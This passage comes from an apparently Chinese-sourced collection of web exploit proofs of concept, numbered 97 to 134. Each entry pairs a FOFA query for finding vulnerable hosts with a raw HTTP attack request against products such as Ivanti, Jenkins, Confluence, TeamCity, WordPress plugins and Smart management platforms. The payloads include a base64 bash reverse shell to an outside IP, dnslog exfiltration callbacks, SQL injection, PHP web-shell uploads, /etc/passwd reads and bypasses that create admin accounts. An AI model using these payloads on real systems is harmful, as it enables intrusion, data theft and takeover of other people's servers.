User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded
Content-Length: 71

groovyProgram='bash+-c+{echo,YmFzaCUyMC1pJTIwPiYlMjAvZGV2L3RjcC8xOTIuMTY4LjQwLjEyOC83Nzc3JTIwMD4mMQ==}|{base64,-d}|{bash,-i}'.execute();

97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
FOFA:body="/assets/js/zhyd.tool.js" || body="OneBlog,开源博客"
GET /passport/login/ HTTP/1.1
Host: 192.168.40.130:8085
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close
Cookie: rememberMe=PAYLOAD
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"


98. SpiderFlow crawler platform remote command execution
CVE-2024-0195
FOFA:app="SpiderFlow"
POST /function/save HTTP/1.1
Host: 192.168.40.130:8088
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 121
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest

id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B

99. Ncast (Yingkeshi) HD smart recording system busiFacade RCE
CVE-2024-0305
FOFA:app="Ncast-产品" && title=="高清智能录播系统"
POST /classes/common/busiFacade.php HTTP/1.1
Host: 192.168.40.130:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Connection: close
Content-Length: 154
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D


100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
CVE-2024-0352
FOFA:icon_hash="874152924"
POST /api/file/formimage HTTP/1.1
Host: 192.168.40.130
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 201
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
Accept-Encoding: gzip

------WebKitFormBoundarygcflwtei
Content-Disposition: form-data; name="file";filename="IE4MGP.php"
Content-Type: application/x-php
2ayyhRXiAsKXL8olvF5s4qqyI2O
------WebKitFormBoundarygcflwtei--

101. Ivanti Policy Secure 22.6 command injection
CVE-2024-21887
FOFA:body="welcome.cgi?p=logo"
GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
CVE-2024-21893
FOFA:body="welcome.cgi?p=logo"
POST /dana-ws/saml20.ws HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 792
Accept-Encoding: gzip

<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <<ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>

103. Ivanti Pulse Connect Secure VPN XXE
CVE-2024-22024
FOFA:body="welcome.cgi?p=logo"
POST /dana-na/auth/saml-sso.cgi HTTP/1.1
Host: 192.168.40.130:111
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Content-Length: 204
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==

The SAMLRequest value is the base64 of the XML file content; the XML file is as follows
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM "http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>

104. Totolink T8 settings cstecgi.cgi getSysStatusCfg information disclosure
CVE-2024-0569
FOFA:title="TOTOLINK"
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host:192.168.0.1
Content-Length:41
Accept:application/json,text/javascript,*/*;q=0.01
X-Requested-with: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
Content-Type: application/x-www-form-urlencoded:charset=UTF-8
Origin: http://192.168.0.1
Referer: http://192.168.0.1/advance/index.html?time=1671152380564
Accept-Encoding:gzip,deflate
Accept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
Connection:close

{
"topicurl":"getSysStatusCfg",
"token":""
}

105. SpringBlade v3.2.0 export-user SQL injection
FOFA:body="https://bladex.vip"
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1

106. SpringBlade dict-biz/list SQL injection
FOFA:body="Saber 将不能正常工作"
GET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

107. SpringBlade tenant/list SQL injection
FOFA:body="https://bladex.vip"
GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Blade-Auth: replace with your own
Connection: close


108. D-Tale 3.9.0 SSRF
CVE-2024-21642
FOFA:"dtale/static/images/favicon.png"
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1
Host: your-ip
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close


109. Jenkins CLI arbitrary file read
CVE-2024-23897
FOFA:header="X-Jenkins"
POST /cli?remoting=false HTTP/1.1
Host:
Content-type: application/octet-stream
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: upload
Connection: keep-alive
Content-Length: 163
b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'


POST /cli?remoting=false HTTP/1.1
Host:
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0


ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
[COMMAND]
Lists all the available commands or a detailed description of single command.
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)

110. GoAnywhere MFT unauthenticated admin account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA: body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip

Step 2: replace the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "value obtained in step 1",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}


116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0
----------767099171
Content-Disposition: form-data; name="action"
configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"
jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png
----------767099171--


117. WordPress LayerSlider plugin SQL injection
version:7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

118. Beijing Byzoro Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"
/home/src.php
-----------------------------13979701222747646634037182887--


Access /home/src.php

119. Beijing Byzoro Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default account/password is admin/admin
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded;
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456


120. Beijing Byzoro Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Byzoro Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328

boot/web/upload/weblogo/1.php

122. Beijing Baichuo Smart S200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
The sql parameter carries the SQL statement base64-encoded (encoded, not encrypted): c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= decodes to select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

The payload writes the output of the command (id here) into the X-Cmd-Response response header, so that header is where to look for the result.

124. Hunan Jianyan (湖南建研) engineering quality testing system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

The written file is then served from http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

Once the user has been created, log in to the admin console with it; system commands can be executed from there.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

Send the request with a client that does not normalise the path before sending it (for example curl --path-as-is, or a raw request in Burp); browsers and most HTTP libraries collapse the .. segments client-side and the request never reaches the vulnerable code.

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

A DNS lookup for the dnslog hostname confirms that the external entity was resolved.

128. Adobe ColdFusion deserialization
CVE-2023-38203
Affected: Adobe ColdFusion 2018 update 17 and earlier, 2021 update 7 and earlier, 2023 update 1 and earlier
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read /etc/passwd, sending the uuid from step 1 in the uuid request header
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

Note that the only "authentication" in the request is the forgeable Cookie: user_name=1; user_id=3.

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
Time-based blind injection through the orderBy parameter: the response is delayed by 3 seconds when the database name is 11 characters long.

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "<username>", "password": "<password>", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199 (path traversal to authenticated pages):
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

Public exploit script: CVE-2024-27198-RCE.py

133. H5 cloud mall (H5云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Affected: Netentsec NS-ASG Application Security Gateway 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

